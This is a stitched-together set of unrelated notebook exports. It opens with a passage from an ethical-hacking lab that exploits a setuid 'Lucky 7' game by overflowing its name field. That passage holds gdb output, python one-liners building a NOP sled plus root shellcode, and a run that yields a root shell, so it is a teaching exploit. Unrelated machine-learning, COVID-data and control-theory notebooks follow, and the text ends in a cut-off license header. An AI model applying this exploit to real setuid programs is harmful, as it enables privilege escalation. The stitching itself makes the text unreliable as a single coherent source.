3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 858770 credits] -> Enter your choice [1-7]:
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b0bf
the random number is: 4
Sorry! Better luck next time...
You have 858760 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�]
[You have 858760 credits] -> Enter your choice [1-7]:
Change user name
Enter your new name:
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����]
[You have 858760 credits] -> Enter your choice [1-7]:
[DEBUG] current_game pointer 0xffffdf80
whoami
root
exit
```
- congratulations on getting your shellcode executed!!
### Smuggling Shellcode into Program's Buffer
### Note: not working!!!
- since the program is setuid, it "should" give you a root shell if you can manage to smuggle and execute root shellcode!
- goal is to overwrite `player.name` with shellcode
- overflow the `player.current_game` attribute with the address of the smuggled shellcode
- NOTE: we're not overflowing the return address, though you could!
- find the address of `player.name` attribute using gdb
- run `lucky7.exe` game from a terminal
- from another terminal, find its pid
```bash
# Terminal 1
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith ]
[You have 809140 credits] -> Enter your choice [1-7]:
#Terminal 2
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe
root 2639 0.0 0.0 5476 1264 pts/2 S+ 15:01 0:00 ./lucky7.exe
kali 2932 0.0 0.0 6320 660 pts/3 S+ 15:01 0:00 grep --color=auto lucky7.exe
┌──(kali㉿K)-[~]
└─$ sudo gdb -q --pid=2639
[sudo] password for kali:
Attaching to process 2639
Reading symbols from /home/kali/projects/EthicalHacking/demos/other_overflow/lucky7.exe...
Reading symbols from /lib32/libstdc++.so.6...
(No debugging symbols found in /lib32/libstdc++.so.6)
Reading symbols from /lib32/libgcc_s.so.1...
(No debugging symbols found in /lib32/libgcc_s.so.1)
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib32/libm.so.6...
(No debugging symbols found in /lib32/libm.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
0xf7fcb559 in __kernel_vsyscall ()
warning: File "/home/kali/.gdbinit" auto-loading has been declined by your `auto-load safe-path' set to "$debugdir:$datadir/auto-load".
To enable execution of this file add
add-auto-load-safe-path /home/kali/.gdbinit
line to your configuration file "/root/.gdbinit".
To completely disable this security protection add
set auto-load safe-path /
line to your configuration file "/root/.gdbinit".
For more information about this security protection see the
"Auto-loading safe path" section in the GDB manual. E.g., run from the shell:
info "(gdb)Auto-loading safe path"
(gdb) p/x &player.name
$1 = 0x8050128
(gdb) p/x &player.current_game
$2 = 0x805018c
(gdb) p/u 0x805018c - 0x8050128
$3 = 100
(gdb)
(gdb) quit
```
- so the address of `player.name` is 0x8050128
- the offset to overwrite `player.current_game` from `player.name` is 100!
- exploit code should look like this: [NOP sled | shellcode | SHELLCODE_ADDRESS]
- NOP sled + shellcode should be 100 bytes long
- let's find the length of the root shellcode in `shellcode` folder
```
%pwd
%cd ./demos/other_overflow
! wc -c ../../shellcode/shellcode_root.bin
# NOP sled length = 100-byte name field - 35-byte shellcode
100 - 35
# let's write NOP sled to a binary file
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*65)' > ./lucky7_exploit.bin
! wc -c ./lucky7_exploit.bin
# lets append shellcode to the exploitcode
! cat ../../shellcode/shellcode_root.bin >> ./lucky7_exploit.bin
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin
print(hex(0x08050128 + 25))
# let's append an address inside the NOP sled: 0x8050141 (= player.name 0x8050128 + 25)
! python -c 'import sys; sys.stdout.buffer.write(b"\x41\x01\x05\x08\n")' >> ./lucky7_exploit.bin
! hexdump -C ./lucky7_exploit.bin
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n")' > lucky7_final_exploit.bin
! hexdump -C lucky7_final_exploit.bin
! cat lucky7_exploit.bin >> lucky7_final_exploit.bin
! python -c 'import sys; sys.stdout.buffer.write(b"1\n")' >> lucky7_final_exploit.bin
! wc -c ./lucky7_final_exploit.bin
! hexdump -C ./lucky7_final_exploit.bin
```
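The payload construction above can be condensed into one helper. A sketch: the mid-sled targeting (`len(sled) // 2`) is my own choice so that a slightly-off address still lands in the sled — the cells above aim 25 bytes in, which works the same way:

```python
import struct

def build_shellcode_payload(name_addr, shellcode, field_len=100):
    """[NOP sled | shellcode | address]: the sled pads the 100-byte name field, and
    the 4-byte address lands exactly on player.current_game, which sits right after it."""
    if len(shellcode) > field_len:
        raise ValueError("shellcode does not fit in the name field")
    sled = b"\x90" * (field_len - len(shellcode))
    target = name_addr + len(sled) // 2  # aim into the middle of the NOP sled
    return sled + shellcode + struct.pack("<I", target)

fake_shellcode = b"\xcc" * 35  # stand-in for the 35-byte root shellcode
payload = build_shellcode_payload(0x08050128, fake_shellcode)
print(len(payload))  # 65 + 35 + 4 = 104
```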
- exploit the program with the final exploit created
```
$ cat lucky7_final_exploit.bin - | ./lucky7.exe
```
- NOTICE: the hyphen after the exploit
- it tells the cat program to send standard input after the exploit buffer, returning control of the input to you
- even though the shell doesn't display its prompt, it is still accessible
- stash both user and root shellcode and force the program to execute them
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat lucky7_final_exploit.bin - | ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr ]
[You have 918420 credits] -> Enter your choice [1-7]:
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b0bf
the random number is: 7
*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*
Congratulations!
You have won the jackpot of 10000 (10K) credits!
You have 928410 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr �]
[You have 928410 credits] -> Enter your choice [1-7]:
Change user name
Enter your new name:
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: �����������������������������������������������������������������1�1�1ə��j
XQh//shh/bin��Q��S��]
[You have 928410 credits] -> Enter your choice [1-7]:
[DEBUG] current_game pointer 0x08050141
ls
zsh: broken pipe cat lucky7_final_exploit.bin - |
zsh: segmentation fault ./lucky7.exe
```
## Exercise
- smuggle the shellcode into the name field, find its address, and exploit the program
- smuggle both user and root shells
```
#import modules
import re
import nltk
import numpy as np
import pandas as pd
from nltk.stem.porter import PorterStemmer
from nltk.corpus import stopwords
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import metrics
from sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.decomposition import PCA
#import dataset
df = pd.read_csv("./Datasets/Combined_dataset.csv", parse_dates=["Date"], index_col="Date")
df
df.info()
#text cleaning
cleaned_headlines = []
ps = PorterStemmer()
for i in range(0, len(df)):
    headlines = re.sub('[^a-zA-Z]', ' ', df['Headlines'][i])
    headlines = headlines.lower()
    headlines = headlines.split()
    headlines_stopwords = stopwords.words('english')
    headlines_stopwords.remove('not')
    headlines = [ps.stem(word) for word in headlines if word not in set(headlines_stopwords)]
    headlines = ' '.join(headlines)
    cleaned_headlines.append(headlines)
len(cleaned_headlines)
#vectorization
cv = CountVectorizer()
X = cv.fit_transform(cleaned_headlines).toarray()
Y = df.iloc[:, -1].values
Y
#split the data into train and test
X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2,random_state=0)
#create model
nb_model = GaussianNB()
nb_model.fit(X_train,Y_train)
#predict Y
Y_predict = nb_model.predict(X_test)
np.concatenate((Y_predict.reshape(len(Y_predict),1), Y_test.reshape(len(Y_test),1)),1)  # predictions next to true labels
#check confusion matrix and accuracy
print(metrics.confusion_matrix(Y_test, Y_predict))
print(metrics.accuracy_score(Y_test, Y_predict))
##Hyperparameter Tuning
cv_method = RepeatedStratifiedKFold(n_splits=5, n_repeats=3, random_state=999)
params_NB = {'var_smoothing': np.logspace(0,-9, num=10)}
gs_NB = GridSearchCV(estimator=nb_model, param_grid=params_NB, cv=cv_method, verbose=1, scoring='accuracy')
gs_NB.fit(X, Y)
result = gs_NB.cv_results_
print("Tuned Naive Bayes Parameters: {}".format(gs_NB.best_params_))
print("Best score is {}".format(gs_NB.best_score_))
pipe = Pipeline(steps=[
    ('pca', PCA()),
    ('estimator', GaussianNB()),
])
parameters = {'estimator__var_smoothing': [1e-11, 1e-10, 1e-9]}
Bayes = GridSearchCV(pipe, parameters, scoring='accuracy', cv=10).fit(X, Y)
print(Bayes.best_estimator_)
print('best score: {}'.format(Bayes.best_score_))
predictions = Bayes.best_estimator_.predict(X_test)
np.concatenate((predictions.reshape(len(predictions),1), Y_test.reshape(len(Y_test),1)),1)  # predictions next to true labels
```
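The cleaning loop at the top of this notebook can be condensed into a function. A dependency-free sketch — stemming is omitted, and the stopword list here is a tiny illustrative stand-in for NLTK's full English list (with 'not' deliberately kept, as above):

```python
import re

# Minimal version of the headline-cleaning step (no NLTK, no stemming).
STOPWORDS = {"the", "a", "an", "is", "to", "of", "and", "in"}  # 'not' deliberately excluded

def clean_headline(text):
    """Strip non-letters, lowercase, and drop stopwords -- same shape as the loop above."""
    words = re.sub(r"[^a-zA-Z]", " ", text).lower().split()
    return " ".join(w for w in words if w not in STOPWORDS)

print(clean_headline("Stocks fall: tech is NOT to blame, say 3 analysts!"))
# stocks fall tech not blame say analysts
```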
This notebook contains the code needed to process the data which tracks the POIS and diversity, as generated by the SOS framework
Because of the large size of these tables, not all in-between artifacts are provided
This code is part of the paper "The Importance of Being Restrained"
```
import numpy as np
import pickle
import pandas as pd
from functools import partial
import glob
import seaborn as sbs
import matplotlib.pyplot as plt
from scipy.stats import kendalltau, rankdata
font = {'size' : 20}
plt.rc('font', **font)
base_folder = "/mnt/e/Research/DE/" #Update to required folder
output_location = "Datatables/"
def get_merged_dt(cross, sdis, F, CR, popsize):
    dt_large = pd.DataFrame()
    files = glob.glob(f"{base_folder}Runs_only/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
    for f in files:
        dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
        dt_large = pd.concat([dt_large, dt_temp])  # DataFrame.append was removed in pandas 2.0
    dt_large['cross'] = cross
    dt_large['sdis'] = sdis
    dt_large['F'] = F
    dt_large['CR'] = CR
    dt_large['popsize'] = popsize
    return dt_large
def get_full_dt():
    dt_full = pd.DataFrame()
    for cross in ['b','e']:
        for sdis in ['c', 'h', 'm', 's', 't', 'u']:
            for CR in ['005', '099']:
                for F in ['0916', '005']:
                    for popsize in [5,20,100]:
                        dt_temp = get_merged_dt(cross, sdis, F, CR, popsize)
                        dt_full = pd.concat([dt_full, dt_temp])
    return dt_full
def get_merged_dt_v2(cross, sdis, F, CR, popsize):
    dt_large = pd.DataFrame()
    files = glob.glob(f"{base_folder}CosineSimilarity-MoreData/CosineSimilarity-MoreData/7/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
    if len(files) == 0:
        return dt_large
    for f in files:
        dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
        dt_large = pd.concat([dt_large, dt_temp])
    dt_large['cross'] = cross
    dt_large['sdis'] = sdis
    dt_large['F'] = F
    dt_large['CR'] = CR
    dt_large['popsize'] = popsize
    dt_large.columns = ['cosine', 'applied', 'accept', 'cross', 'sdis', 'F', 'CR', 'popsize']
    return dt_large
for cross in ['b','e']:
    for sdis in ['c', 'h', 'm', 's', 't', 'u']:
        for CR in ['005','0285','052','0755','099']:
            for F in ['005','0285','052','0755','099']:
                for popsize in [5, 20, 100]:
                    dt = get_merged_dt_v2(cross, sdis, F, CR, popsize)
                    dt.to_csv(f"{output_location}DEro{cross}_{sdis}_p{popsize}_F{F}CR{CR}_cosine.csv")
def get_merged_dt_v3(sdis, F, CR, popsize):
    dt_large = pd.DataFrame()
    files = glob.glob(f"{base_folder}CosineSimilarity-LookingCloser/7/DErob{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
    if len(files) == 0:
        return dt_large
    for f in files:
        dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
        dt_large = pd.concat([dt_large, dt_temp])
    dt_large['sdis'] = sdis
    dt_large['F'] = F
    dt_large['CR'] = CR
    dt_large['popsize'] = popsize
    dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']
    return dt_large
for sdis in ['c', 'h', 'm', 's', 't', 'u']:
    for popsize in [5, 20, 100]:
        for idx_0, F in enumerate(['099','0755','052','0285','005']):
            for idx_1, CR in enumerate(['0041','0081','0121','0161','0201']):
                dt = get_merged_dt_v3(sdis, F, CR, popsize)
                dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v3.csv")
def get_merged_dt_v4(sdis, F, CR, popsize):
    dt_large = pd.DataFrame()
    files = glob.glob(f"{base_folder}Div_cos_sim/CosineSimilarity/7/DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt")
    if len(files) == 0:
        return dt_large
    for f in files:
        dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
        dt_large = pd.concat([dt_large, dt_temp])
    dt_large['sdis'] = sdis
    dt_large['F'] = F
    dt_large['CR'] = CR
    dt_large['popsize'] = popsize
    dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']
    return dt_large
for F in ['0285', '099', '052', '005']:  # '0755',
    for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:
        for popsize in [5, 20, 100]:
            for sdis in ['t', 'h', 'm', 's', 'c', 'u']:
                dt = get_merged_dt_v4(sdis, F, CR, popsize)
                dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v4.csv")
def get_diversity_dt(sdis, F, CR, popsize):
    dt_large = pd.DataFrame()
    files = glob.glob(f"{base_folder}Div_cos_sim/CosineSimilarity/7/Diversity-DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt")
    if len(files) == 0:
        return dt_large
    for f in files:
        dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
        dt_large = pd.concat([dt_large, dt_temp])
    dt_large['sdis'] = sdis
    dt_large['F'] = F
    dt_large['CR'] = CR
    dt_large['popsize'] = popsize
    dt_large.columns = ['div0', 'div1', 'sdis', 'F', 'CR', 'popsize']
    return dt_large
for F in ['0755','0285', '099', '052', '005']:
    for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:
        for popsize in [5, 20, 100]:
            for sdis in ['t', 'h', 'm', 's', 'c', 'u']:
                dt = get_diversity_dt(sdis, F, CR, popsize)
                dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_diversity.csv")
```
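The loader functions above all follow one pattern: glob the run files, stack them, then tag every row with fixed parameter columns. A generic version (a sketch; it uses `pd.concat` since `DataFrame.append` was removed in pandas 2.0, and assumes the same whitespace-separated, skip-one-header-line file format):

```python
import glob

import pandas as pd

def load_runs(pattern, extra_cols, col_names=None):
    """Concatenate all run files matching `pattern`, then tag every row with the
    fixed parameter columns in `extra_cols` (generic form of get_merged_dt_*)."""
    frames = [pd.read_csv(f, sep=' ', header=None, skiprows=1)
              for f in sorted(glob.glob(pattern))]
    if not frames:
        return pd.DataFrame()
    dt = pd.concat(frames, ignore_index=True)
    for key, value in extra_cols.items():
        dt[key] = value
    if col_names is not None:
        dt.columns = col_names
    return dt
```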
# Welcome to Covid19 Data Analysis Notebook
------------------------------------------
### Let's Import the modules
```
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
```
## Task 2
### Task 2.1: importing covid19 dataset
importing "covid19_Confirmed_dataset.csv" from the "./Datasets" folder.
```
corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')
corona_dataset_csv.head()
```
#### Let's check the shape of the dataframe
```
corona_dataset_csv.shape
```
### Task 2.2: Delete the useless columns
```
df = corona_dataset_csv.drop(['Lat','Long'],axis = 1)
df.head()
# if we want to change original file:
corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')
corona_dataset_csv.drop(['Lat','Long'],axis=1,inplace=True)
corona_dataset_csv.head(10)
```
### Task 2.3: Aggregating the rows by the country
```
corona_dataset_aggregated = corona_dataset_csv.groupby("Country/Region").sum()
corona_dataset_aggregated.head(10)
corona_dataset_aggregated.shape
```
### Task 2.4: Visualizing data related to a country for example China
visualization always helps for better understanding of our data.
```
corona_dataset_aggregated.loc['China']
corona_dataset_aggregated.loc['China'].plot() # locate
corona_dataset_aggregated.loc['Italy'].plot()
corona_dataset_aggregated.loc['US'].plot()
plt.legend()
```
### Task3: Calculating a good measure
we need to find a good measure, represented as a number, describing the spread of the virus in a country.
```
corona_dataset_aggregated.loc['China'].plot()
corona_dataset_aggregated.loc['China'][:5].plot()
corona_dataset_aggregated.loc['China'].diff().plot()
```
### task 3.1: calculating the first derivative of the curve
```
corona_dataset_aggregated.loc['China'].diff().plot()
```
### task 3.2: find maximum infection rate for China
```
corona_dataset_aggregated.loc['China'].diff().max()
corona_dataset_aggregated.loc['China'].diff().argmax()
corona_dataset_aggregated.loc['China'].diff().idxmax()
```
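What `.diff().max()` and `.idxmax()` compute, spelled out on a toy list in plain Python (no pandas):

```python
# Cumulative confirmed cases -> daily new cases -> peak day.
cumulative = [0, 2, 5, 30, 40]
daily_new = [b - a for a, b in zip(cumulative, cumulative[1:])]  # first difference
max_rate = max(daily_new)                                       # .diff().max()
peak_day = daily_new.index(max_rate) + 1                        # +1: diff shifts by one position
print(daily_new, max_rate, peak_day)  # [2, 3, 25, 10] 25 3
```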
### Task 3.3: find maximum infection rate for all of the countries.
```
corona_dataset_aggregated = corona_dataset_csv.groupby("Country/Region").sum()
countries = list(corona_dataset_aggregated.index)
max_infection_number = []
max_infection_date = []
for country in countries:
    max_infection_number.append(corona_dataset_aggregated.loc[country].diff().max())
    max_infection_date.append(corona_dataset_aggregated.loc[country].diff().idxmax())
corona_dataset_aggregated['max_infection_number'] = max_infection_number
corona_dataset_aggregated['max_infection_date'] = max_infection_date
corona_dataset_aggregated.head()
```
### Task 3.4: create a new dataframe with only needed column
```
corona_data = pd.DataFrame(corona_dataset_aggregated['max_infection_number'])
corona_data.head()
```
### Task 4:
- Importing the WorldHappinessReport.csv dataset
- selecting needed columns for our analysis
- join the datasets
- calculate the correlations as the result of our analysis
### Task 4.1 : importing the dataset
```
world_happiness_report = pd.read_csv("Datasets/worldwide_happiness_report.csv")
world_happiness_report.head(20)
world_happiness_report.shape
```
### Task 4.2: let's drop the useless columns
```
world_happiness_report = pd.read_csv("Datasets/worldwide_happiness_report.csv")
columns_to_drop = ['Overall rank','Score','Generosity','Perceptions of corruption']
world_happiness_report.drop(columns_to_drop, axis=1, inplace=True)
world_happiness_report.head()
```
### Task 4.3: changing the indices of the dataframe
```
# change index by name
world_happiness_report.set_index(['Country or region'],inplace=True)
world_happiness_report.head()
```
### Task 4.4: Now let's join the two datasets we have prepared
#### Corona Dataset :
```
corona_data.head()
corona_data.shape
```
#### World Happiness Report dataset:
```
world_happiness_report.head()
world_happiness_report.shape
data1 = corona_data.join(world_happiness_report)
print(data1.shape)
data1.head()
# An inner join drops the countries that are not in the happiness csv
data2 = corona_data.join(world_happiness_report, how='inner')
print(data2.shape)
data2.head()
# Join corona data into happiness: a country present in corona but not in happiness is dropped
data3 = world_happiness_report.join(corona_data).copy()
print(data3.shape)
data3.head()
```
### Task 4.5: correlation matrix
```
data1.corr()
data2.corr()
data3.corr()
```
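Since the question is how the spread measure relates to the happiness factors, the single column of interest can be pulled out of the correlation matrix and sorted. A minimal, self-contained sketch (the tiny DataFrame below is a hypothetical stand-in for `data2`, just to show the pattern):

```python
import pandas as pd

# Hypothetical stand-in for data2: spread measure joined with two happiness factors
df = pd.DataFrame({
    'max_infection_number': [100, 400, 900, 1600],
    'GDP per capita': [0.5, 1.0, 1.5, 2.0],
    'Social support': [1.2, 1.1, 1.4, 1.5],
})

# Correlation of every factor with the spread measure, strongest first
corr = df.corr()['max_infection_number'].drop('max_infection_number')
print(corr.sort_values(ascending=False))
```

On the real `data2` the same two lines rank all four happiness factors by their correlation with the maximum infection number.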
### Task 5: Visualization of the results
Our analysis is not finished unless we visualize the results in figures and graphs, so that everyone can understand what we got out of it.
```
print(data2.shape)
data2.head()
```
### Task 5.1: Plotting GDP vs maximum Infection rate
```
x = data2['GDP per capita']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x, y)  # scatter plot
plt.figure()
sns.scatterplot(x, np.log(y))  # scatter plot of the log-transformed counts
sns.regplot(x, np.log(y))  # add a regression line
```
### Task 5.2: Plotting Social support vs maximum Infection rate
```
x = data2['Social support']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x, y)  # scatter plot
plt.figure()
sns.scatterplot(x, np.log(y))  # scatter plot of the log-transformed counts
plt.figure()
sns.regplot(x, np.log(y))  # add a regression line
```
### Task 5.3: Plotting Healthy life expectancy vs maximum Infection rate
```
x = data2['Healthy life expectancy']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x, y)  # scatter plot
plt.figure()
sns.scatterplot(x, np.log(y))  # scatter plot of the log-transformed counts
plt.figure()
sns.regplot(x, np.log(y))  # add a regression line
```
### Task 5.4: Plotting Freedom to make life choices vs maximum Infection rate
```
x = data2['Freedom to make life choices']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x, y)  # scatter plot
plt.figure()
sns.scatterplot(x, np.log(y))  # scatter plot of the log-transformed counts
plt.figure()
sns.regplot(x, np.log(y))  # add a regression line
```
# Stability verification of a fixed uncertain system (without dynamic programming)
```
from __future__ import division, print_function
import tensorflow as tf
import gpflow
import numpy as np
import matplotlib.pyplot as plt
from future.builtins import *
from functools import partial
%matplotlib inline
import plotting
import safe_learning
try:
session.close()
except NameError:
pass
graph = tf.Graph()
session = tf.InteractiveSession(graph=graph)
session.run(tf.global_variables_initializer())
```
We start by defining a discretization of the space $[-1, 1]$ with discretization constant $\tau$
```
discretization = safe_learning.GridWorld([-1, 1], 1001)
tau = 1 / discretization.nindex
print('Grid size: {0}'.format(discretization.nindex))
```
We define the GP model using one particular sample of the GP, in addition to a stable, closed-loop, linear model.
$$x_{k+1} = 0.25\, x_k + g_\pi(x_k),$$
The prior dynamics are locally asymptotically stable. Moreover, in the one-dimensional case, the dynamics are stable as long as $|x_{k+1}| \leq |x_{k}|$.
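As a quick sanity check (plain Python, not part of the `safe_learning` API), iterating the prior mean dynamics alone — i.e. dropping the unknown GP term $g_\pi$ — shows the contraction:

```python
x = 1.0  # start at the edge of the domain [-1, 1]
trajectory = [x]
for _ in range(10):
    x = 0.25 * x  # prior mean dynamics without the GP term g_pi
    trajectory.append(x)

# The magnitude shrinks at every step, so |x_{k+1}| <= |x_k| holds
assert all(abs(b) <= abs(a) for a, b in zip(trajectory, trajectory[1:]))
print(trajectory[-1])  # 0.25**10, about 9.54e-07
```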
```
# Observation noise
noise_var = 0.01 ** 2
with tf.variable_scope('gp'):
# Mean dynamics
mean_function = safe_learning.LinearSystem((0.25, 0.), name='mean_dynamics')
kernel = (gpflow.kernels.Matern32(1, lengthscales=1, variance=0.4**2, active_dims=[0])
* gpflow.kernels.Linear(1, active_dims=[0]))
gp = safe_learning.GPRCached(np.empty((0, 2), dtype=safe_learning.config.np_dtype),
np.empty((0, 1), dtype=safe_learning.config.np_dtype),
kernel,
mean_function=mean_function)
gp.likelihood.variance = noise_var
gpfun = safe_learning.GaussianProcess(gp, name='gp_dynamics')
# Define one sample as the true dynamics
np.random.seed(5)
# # Set up a discretization
sample_disc = np.hstack((np.linspace(-1, 1, 50)[:, None],
np.zeros((50, 1))))
# # Draw samples
fs = safe_learning.sample_gp_function(sample_disc, gpfun, number=10, return_function=False)
plt.plot(sample_disc[:, 0], fs.T)
plt.ylabel('$g(x)$')
plt.xlabel('x')
plt.title('Samples drawn from the GP model of the dynamics')
plt.show()
true_dynamics = safe_learning.sample_gp_function(
sample_disc,
gpfun)[0]
# Plot the basic model
with tf.variable_scope('plot_true_dynamics'):
true_y = true_dynamics(sample_disc, noise=False).eval(feed_dict=true_dynamics.feed_dict)
plt.plot(sample_disc[:, 0], true_y, color='black', alpha=0.8)
plt.title('GP model of the dynamics')
plt.show()
# lyapunov_function = safe_learning.QuadraticFunction(np.array([[1]]))
lyapunov_disc = safe_learning.GridWorld([-1., 1.], 3)
lyapunov_function = safe_learning.Triangulation(lyapunov_disc, [1, 0, 1], name='lyapunov_function')
dynamics = gpfun
policy = safe_learning.LinearSystem(np.array([0.]), name='policy')
# Lipschitz constant
# L_dyn = 0.25 + dynamics.beta(0) * np.sqrt(gp.kern.Mat32.variance) / gp.kern.Mat32.lengthscale * np.max(np.abs(extent))
# L_V = np.max(lyapunov_function.gradient(grid))
L_dyn = 0.25
L_V = 1.
lyapunov = safe_learning.Lyapunov(discretization, lyapunov_function, dynamics, L_dyn, L_V, tau, policy)
# Specify the desired accuracy
# accuracy = np.max(lyapunov.V) / 1e10
```
## Safety based on GP model
Let's start by plotting the prior over the dynamics and the associated prior over $\dot{V}(x)$.
```
lyapunov.update_safe_set()
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)
```
Clearly the model does not allow us to classify any states as safe ($\dot{V} < -L \tau$). However, as a starting point, we assume that we know that the system is asymptotically stable within some initial set, $\mathcal{S}_0$:
$$\mathcal{S}_0 = \{ x \in \mathbb{R} \,|\, |x| < 0.2 \}$$
```
lyapunov.initial_safe_set = np.abs(lyapunov.discretization.all_points.squeeze()) < 0.2
```
## Online learning
As we sample within this initial safe set, we gain more knowledge about the system. In particular, we iteratively select the state within the safe set, $\mathcal{S}_n$, where the dynamics are most uncertain (highest variance).
```
grid = lyapunov.discretization.all_points
lyapunov.update_safe_set()
with tf.variable_scope('sample_new_safe_point'):
safe_set = tf.placeholder(safe_learning.config.dtype, [None, None])
_, dynamics_std_tf = lyapunov.dynamics(safe_set, lyapunov.policy(safe_set))
tf_max_state = tf.placeholder(safe_learning.config.dtype, [1, None])
tf_max_action = lyapunov.policy(tf_max_state)
tf_measurement = true_dynamics(tf_max_state, tf_max_action)
feed_dict = lyapunov.dynamics.feed_dict
def update_gp():
"""Update the GP model based on an actively selected data point."""
# Maximum uncertainty in safe set
safe_grid = grid[lyapunov.safe_set]
feed_dict[safe_set] = safe_grid
dynamics_std = dynamics_std_tf.eval(feed_dict=feed_dict)
max_id = np.argmax(dynamics_std)
max_state = safe_grid[[max_id], :].copy()
feed_dict[tf_max_state] = max_state
max_action, measurement = session.run([tf_max_action, tf_measurement],
feed_dict=feed_dict)
arg = np.hstack((max_state, max_action))
lyapunov.dynamics.add_data_point(arg, measurement)
lyapunov.update_safe_set()
# Update the GP model a couple of times
for i in range(4):
update_gp()
# Plot the new safe set
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)
```
We continue to sample like this until we find the maximum safe set:
```
for i in range(20):
update_gp()
lyapunov.update_safe_set()
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=False)
plotting.show_graph(tf.get_default_graph())
```
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
